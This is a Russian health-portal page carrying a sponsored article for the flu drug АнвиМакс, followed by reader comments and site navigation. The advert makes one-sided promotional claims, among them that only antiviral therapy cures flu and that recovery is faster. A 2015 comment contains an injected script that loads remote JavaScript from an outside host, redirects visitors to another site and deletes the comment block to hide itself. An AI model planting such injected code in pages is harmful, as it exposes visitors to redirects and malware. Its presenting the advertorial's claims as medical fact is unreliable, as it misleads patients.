Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Победа над гриппом  >>  Победа над гриппом
 
Обратная связь
 

Победа над гриппом

Размер шрифта
17 декабря 2012 00:00
  • google_analytics: false
  • Нравится

Высокая температура, насморк, кашель, боль в мышцах, «тяжелая» голова. Симптомы знакомы практически всем: острыми респираторными заболеваниями и гриппом хоть раз в жизни переболел каждый.

победа над гриппом

А жизнь в мегаполисах способствует тому, что большинство населения болеет ежегодно. И каждый год приносит различные вариации вируса, поэтому зачастую профилактические прививки не действуют, и вчера еще здоровый человек сегодня лежит дома с температурой, насморком и кашлем и всеми доступными фармацевтическими средствами пытается облегчить свое состояние.  А как правильно лечиться при гриппе? Ведь если грипп и ОРВИ лечить неправильно, то течение болезни может осложниться: например, к вирусной инфекции присоединится еще и бактериальная. В результате возникают серьезные осложнения: бронхиты, отиты, менингиты и пр. А такое осложнение, как пневмония, может начаться практически с первых дней. Поэтому адекватное и эффективное лечение – необходимое условие полного выздоровления и отсутствия осложнений.

В случае с вирусными инфекциями единственно адекватной терапией является противовирусная терапия. Только прямое действие на жизнедеятельность вируса обеспечивает выздоровление.

Именно таким действием обладает отечественный препарат против простуды и гриппа АнвиМакс. И пусть вас не смущает название АнвиМакс: многим этот препарат был хорошо знаком под старым названием Антигриппин-Максимум. Теперь он называется АнвиМакс, и это единственное обновление. Все остальное – запатентованный состав, сырье и производитель остались прежними. Сравним состав препарата АнвиМакс с составом стандартного комбинированного препарата  против простуды.

Действие препарата и активные компоненты

АНВИМАКС

стандартный комбинированный препарат против простуды и гриппа

Болеутоляющее и жаропонижающее действие

есть

есть

Антиаллергическое и противоотечное действие

есть

есть

Противовирусное действие (римантадин)

есть

нет

Защитное действие на сосуды

есть

нет

Общеукрепляющее действие

есть

есть

Внимательный читатель уже увидел основную разницу между представленными в таблице препаратами: АнвиМакс нейтрализует вирус, а стандартный комбинированный препарат только купирует симптомы заболевания, но никак не действует на его основную причину. И очевидно, что прием такого препарата не только не обеспечивает выздоровления, но и может спровоцировать осложнения, т.к. испытав небольшое облегчение, больной человек возвращается к активной жизни с ее нагрузками, стрессами и пр. А вирус в это время начнет вторую, более тяжелую «волну атаки». Поэтому не стоит обманывать организм, применяя только лишь симптоматическое лечение.

Двойная «сила» АнвиМакс – против вируса и против основных симптомов гриппа – позволяет добиться полноценного выздоровления и избежать осложнений.  Более того, период выздоровления при лечении препаратом АнвиМакс сокращается почти в полтора раза по сравнению с периодом выздоровления при лечении обыкновенными комбинированными средствами. Перед применением препарата проконсультируйтесь с лечащим врачом.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему не помогают антибиотики?   Весенние ловушки   Природная защита от вирусов – интерферон гамма   Болезни-террористы. Свиной грипп  
05 февраля 2013Почему мы болеем гриппом зимой 06 августа 2012Вирус птичьего гриппа не дремлет!
 
04 июля 2012Оказывается, если вы грамотно лечите грипп, то вы защищаете себя от рака кожи 03 февраля 2012Ученые создают универсальную вакцину от гриппа
 

Слайдшоу

1
Как отличить грипп от обычной простуды
Врачи против параллельного мира
Простуда и грипп: 10 первых шагов

Тесты

1
Заболеет ли ваша семья?
Грипп или простуда?
Почему болит горло?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.